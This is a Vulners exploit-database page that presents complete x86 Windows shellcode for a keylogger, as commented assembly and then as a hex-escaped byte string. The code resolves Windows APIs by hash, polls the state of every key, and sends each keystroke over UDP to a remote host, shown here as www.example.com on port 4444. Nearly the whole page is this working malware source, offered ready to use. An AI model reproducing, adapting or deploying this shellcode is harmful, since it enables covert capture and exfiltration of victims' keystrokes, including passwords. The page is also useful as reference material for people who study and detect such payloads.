Vulners
Lucene search
Windows x86 - Keylogger Reverse UDP Shellcode (493 bytes)
; Exploit Title: x86 windows shellcode - keylogger reverse udp - 493 bytes
; Date: Fri Oct 13 12:58:35 GMT 2016
; Exploit Author: Fugu
; Vendor Homepage: www.microsoft.com
; Version: all win
; Tested on: Windows 7(x86), 8.1(x86), 10(x86_64)
; Note: it will write to single byte payload udp packets to host.
; keystrokes are written in format: "Virtual-Key Codes", from
; msdn.microsoft.com website
section .bss
section .data
section .text
global _start
_start:
cld ; 00000000 FC
call dword loc_88h ; 00000001 E882000000
pushad ; 00000006 60
mov ebp,esp ; 00000007 89E5
xor eax,eax ; 00000009 31C0
mov edx,[fs:eax+0x30] ; 0000000B 648B5030
mov edx,[edx+0xc] ; 0000000F 8B520C
mov edx,[edx+0x14] ; 00000012 8B5214
loc_15h:
mov esi,[edx+0x28] ; 00000015 8B7228
movzx ecx,word [edx+0x26] ; 00000018 0FB74A26
xor edi,edi ; 0000001C 31FF
loc_1eh:
lodsb ; 0000001E AC
cmp al,0x61 ; 0000001F 3C61
jl loc_25h ; 00000021 7C02
sub al,0x20 ; 00000023 2C20
loc_25h:
ror edi,byte 0xd ; 00000025 C1CF0D
add edi,eax ; 00000028 01C7
loop loc_1eh ; 0000002A E2F2
push edx ; 0000002C 52
push edi ; 0000002D 57
mov edx,[edx+0x10] ; 0000002E 8B5210
mov ecx,[edx+0x3c] ; 00000031 8B4A3C
mov ecx,[ecx+edx+0x78] ; 00000034 8B4C1178
jecxz loc_82h ; 00000038 E348
add ecx,edx ; 0000003A 01D1
push ecx ; 0000003C 51
mov ebx,[ecx+0x20] ; 0000003D 8B5920
add ebx,edx ; 00000040 01D3
mov ecx,[ecx+0x18] ; 00000042 8B4918
loc_45h:
jecxz loc_81h ; 00000045 E33A
dec ecx ; 00000047 49
mov esi,[ebx+ecx*4] ; 00000048 8B348B
add esi,edx ; 0000004B 01D6
xor edi,edi ; 0000004D 31FF
loc_4fh:
lodsb ; 0000004F AC
ror edi,byte 0xd ; 00000050 C1CF0D
add edi,eax ; 00000053 01C7
cmp al,ah ; 00000055 38E0
jnz loc_4fh ; 00000057 75F6
add edi,[ebp-0x8] ; 00000059 037DF8
cmp edi,[ebp+0x24] ; 0000005C 3B7D24
jnz loc_45h ; 0000005F 75E4
pop eax ; 00000061 58
mov ebx,[eax+0x24] ; 00000062 8B5824
add ebx,edx ; 00000065 01D3
mov cx,[ebx+ecx*2] ; 00000067 668B0C4B
mov ebx,[eax+0x1c] ; 0000006B 8B581C
add ebx,edx ; 0000006E 01D3
mov eax,[ebx+ecx*4] ; 00000070 8B048B
add eax,edx ; 00000073 01D0
mov [esp+0x24],eax ; 00000075 89442424
pop ebx ; 00000079 5B
pop ebx ; 0000007A 5B
popad ; 0000007B 61
pop ecx ; 0000007C 59
pop edx ; 0000007D 5A
push ecx ; 0000007E 51
jmp eax ; 0000007F FFE0
loc_81h:
pop edi ; 00000081 5F
loc_82h:
pop edi ; 00000082 5F
pop edx ; 00000083 5A
mov edx,[edx] ; 00000084 8B12
jmp short loc_15h ; 00000086 EB8D
loc_88h:
pop ebp ; 00000088 5D
push dword 0x3233 ; 00000089 6833320000
push dword 0x5f327377 ; 0000008E 687773325F
push esp ; 00000093 54
push dword 0x726774c ; 00000094 684C772607
call ebp ; 00000099 FFD5
mov eax,0x190 ; 0000009B B890010000
sub esp,eax ; 000000A0 29C4
push esp ; 000000A2 54
push eax ; 000000A3 50
push dword 0x6b8029 ; 000000A4 6829806B00
call ebp ; 000000A9 FFD5
push byte +0x10 ; 000000AB 6A10
jmp dword loc_1ceh ; 000000AD E91C010000
loc_b2h:
push dword 0x803428a9 ; 000000B2 68A9283480
call ebp ; 000000B7 FFD5
lea esi,[eax+0x1c] ; 000000B9 8D701C
xchg esi,esp ; 000000BC 87F4
pop eax ; 000000BE 58
xchg esp,esi ; 000000BF 87E6
mov esi,eax ; 000000C1 89C6
push dword 0x6c6c ; 000000C3 686C6C0000
push dword 0x642e7472 ; 000000C8 6872742E64
push dword 0x6376736d ; 000000CD 686D737663
push esp ; 000000D2 54
push dword 0x726774c ; 000000D3 684C772607
call ebp ; 000000D8 FFD5
jmp dword loc_1e3h ; 000000DA E904010000
loc_dfh:
push dword 0xd1ecd1f ; 000000DF 681FCD1E0D
call ebp ; 000000E4 FFD5
xchg ah,al ; 000000E6 86E0
ror eax,byte 0x10 ; 000000E8 C1C810
inc eax ; 000000EB 40
inc eax ; 000000EC 40
push esi ; 000000ED 56
push eax ; 000000EE 50
mov esi,esp ; 000000EF 89E6
xor eax,eax ; 000000F1 31C0
push eax ; 000000F3 50
push eax ; 000000F4 50
push eax ; 000000F5 50
push eax ; 000000F6 50
inc eax ; 000000F7 40
inc eax ; 000000F8 40
push eax ; 000000F9 50
push eax ; 000000FA 50
push dword 0xe0df0fea ; 000000FB 68EA0FDFE0
call ebp ; 00000100 FFD5
mov edi,eax ; 00000102 89C7
loc_104h:
push byte +0x10 ; 00000104 6A10
push esi ; 00000106 56
push edi ; 00000107 57
push dword 0x6174a599 ; 00000108 6899A57461
call ebp ; 0000010D FFD5
test eax,eax ; 0000010F 85C0
jz loc_122h ; 00000111 740F
dec dword [esi+0x8] ; 00000113 FF4E08
jnz loc_104h ; 00000116 75EC
xor eax,eax ; 00000118 31C0
push eax ; 0000011A 50
push dword 0x56a2b5f0 ; 0000011B 68F0B5A256
call ebp ; 00000120 FFD5
loc_122h:
push dword 0x3233 ; 00000122 6833320000
push dword 0x72657375 ; 00000127 6875736572
push esp ; 0000012C 54
push dword 0x726774c ; 0000012D 684C772607
call ebp ; 00000132 FFD5
push dword 0x657461 ; 00000134 6861746500
push dword 0x74537965 ; 00000139 6865795374
push dword 0x4b746547 ; 0000013E 684765744B
push esp ; 00000143 54
push eax ; 00000144 50
push dword 0x7802f749 ; 00000145 6849F70278
call ebp ; 0000014A FFD5
push esi ; 0000014C 56
push edi ; 0000014D 57
push eax ; 0000014E 50
xor ecx,ecx ; 0000014F 31C9
mov esi,ecx ; 00000151 89CE
mov cl,0x8 ; 00000153 B108
loc_155h:
push esi ; 00000155 56
loop loc_155h ; 00000156 E2FD
loc_158h:
xor ecx,ecx ; 00000158 31C9
xor esi,esi ; 0000015A 31F6
push byte +0x8 ; 0000015C 6A08
push dword 0xe035f044 ; 0000015E 6844F035E0
call ebp ; 00000163 FFD5
loc_165h:
mov eax,esi ; 00000165 89F0
cmp al,0xff ; 00000167 3CFF
jnc loc_158h ; 00000169 73ED
inc esi ; 0000016B 46
push esi ; 0000016C 56
call dword [esp+0x24] ; 0000016D FF542424
mov edx,esi ; 00000171 89F2
xor ecx,ecx ; 00000173 31C9
mov cl,0x80 ; 00000175 B180
and eax,ecx ; 00000177 21C8
xor ecx,ecx ; 00000179 31C9
cmp eax,ecx ; 0000017B 39C8
jnz loc_18fh ; 0000017D 7510
xor edx,edx ; 0000017F 31D2
mov ecx,edx ; 00000181 89D1
mov eax,esi ; 00000183 89F0
mov cl,0x20 ; 00000185 B120
div ecx ; 00000187 F7F1
btr [esp+eax*4],edx ; 00000189 0FB31484
jmp short loc_165h ; 0000018D EBD6
loc_18fh:
xor edx,edx ; 0000018F 31D2
mov ecx,edx ; 00000191 89D1
mov eax,esi ; 00000193 89F0
mov cl,0x20 ; 00000195 B120
div ecx ; 00000197 F7F1
bt [esp+eax*4],edx ; 00000199 0FA31484
jc loc_165h ; 0000019D 72C6
xor edx,edx ; 0000019F 31D2
mov ecx,edx ; 000001A1 89D1
mov eax,esi ; 000001A3 89F0
mov cl,0x20 ; 000001A5 B120
div ecx ; 000001A7 F7F1
bts [esp+eax*4],edx ; 000001A9 0FAB1484
push esi ; 000001AD 56
push byte +0x10 ; 000001AE 6A10
push dword [esp+0x30] ; 000001B0 FF742430
push byte +0x0 ; 000001B4 6A00
push byte +0x1 ; 000001B6 6A01
lea ecx,[esp+0x10] ; 000001B8 8D4C2410
push ecx ; 000001BC 51
push dword [esp+0x3c] ; 000001BD FF74243C
push dword 0xdf5c9d75 ; 000001C1 68759D5CDF
call ebp ; 000001C6 FFD5
lea esp,[esp+0x4] ; 000001C8 8D642404
jmp short loc_158h ; 000001CC EB8A
loc_1ceh:
call dword loc_b2h ; 000001CE E8DFFEFFFF
db "www.example.com",0
loc_1e3h:
call dword loc_dfh
db "4444",0
;"\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50\x30\x8b"
;"\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff\xac\x3c"
;"\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf2\x52\x57\x8b\x52"
;"\x10\x8b\x4a\x3c\x8b\x4c\x11\x78\xe3\x48\x01\xd1\x51\x8b\x59\x20"
;"\x01\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b\x01\xd6\x31\xff\xac"
;"\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03\x7d\xf8\x3b\x7d\x24\x75"
;"\xe4\x58\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3"
;"\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff"
;"\xe0\x5f\x5f\x5a\x8b\x12\xeb\x8d\x5d\x68\x33\x32\x00\x00\x68\x77"
;"\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\xff\xd5\xb8\x90\x01\x00\x00"
;"\x29\xc4\x54\x50\x68\x29\x80\x6b\x00\xff\xd5\x6a\x10\xe9\x1c\x01"
;"\x00\x00\x68\xa9\x28\x34\x80\xff\xd5\x8d\x70\x1c\x87\xf4\x58\x87"
;"\xe6\x89\xc6\x68\x6c\x6c\x00\x00\x68\x72\x74\x2e\x64\x68\x6d\x73"
;"\x76\x63\x54\x68\x4c\x77\x26\x07\xff\xd5\xe9\x04\x01\x00\x00\x68"
;"\x1f\xcd\x1e\x0d\xff\xd5\x86\xe0\xc1\xc8\x10\x40\x40\x56\x50\x89"
;"\xe6\x31\xc0\x50\x50\x50\x50\x40\x40\x50\x50\x68\xea\x0f\xdf\xe0"
;"\xff\xd5\x89\xc7\x6a\x10\x56\x57\x68\x99\xa5\x74\x61\xff\xd5\x85"
;"\xc0\x74\x0f\xff\x4e\x08\x75\xec\x31\xc0\x50\x68\xf0\xb5\xa2\x56"
;"\xff\xd5\x68\x33\x32\x00\x00\x68\x75\x73\x65\x72\x54\x68\x4c\x77"
;"\x26\x07\xff\xd5\x68\x61\x74\x65\x00\x68\x65\x79\x53\x74\x68\x47"
;"\x65\x74\x4b\x54\x50\x68\x49\xf7\x02\x78\xff\xd5\x56\x57\x50\x31"
;"\xc9\x89\xce\xb1\x08\x56\xe2\xfd\x31\xc9\x31\xf6\x6a\x08\x68\x44"
;"\xf0\x35\xe0\xff\xd5\x89\xf0\x3c\xff\x73\xed\x46\x56\xff\x54\x24"
;"\x24\x89\xf2\x31\xc9\xb1\x80\x21\xc8\x31\xc9\x39\xc8\x75\x10\x31"
;"\xd2\x89\xd1\x89\xf0\xb1\x20\xf7\xf1\x0f\xb3\x14\x84\xeb\xd6\x31"
;"\xd2\x89\xd1\x89\xf0\xb1\x20\xf7\xf1\x0f\xa3\x14\x84\x72\xc6\x31"
;"\xd2\x89\xd1\x89\xf0\xb1\x20\xf7\xf1\x0f\xab\x14\x84\x56\x6a\x10"
;"\xff\x74\x24\x30\x6a\x00\x6a\x01\x8d\x4c\x24\x10\x51\xff\x74\x24"
;"\x3c\x68\x75\x9d\x5c\xdf\xff\xd5\x8d\x64\x24\x04\xeb\x8a\xe8\xdf"
;"\xfe\xff\xff\x77\x77\x77\x2e\x65\x78\x61\x6d\x70\x6c\x65\x2e\x63"
;"\x6f\x6d\x00\xe8\xf7\xfe\xff\xff\x34\x34\x34\x34\x00"Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
17 Oct 2016 00:00Current
7.4High risk
Vulners AI Score7.4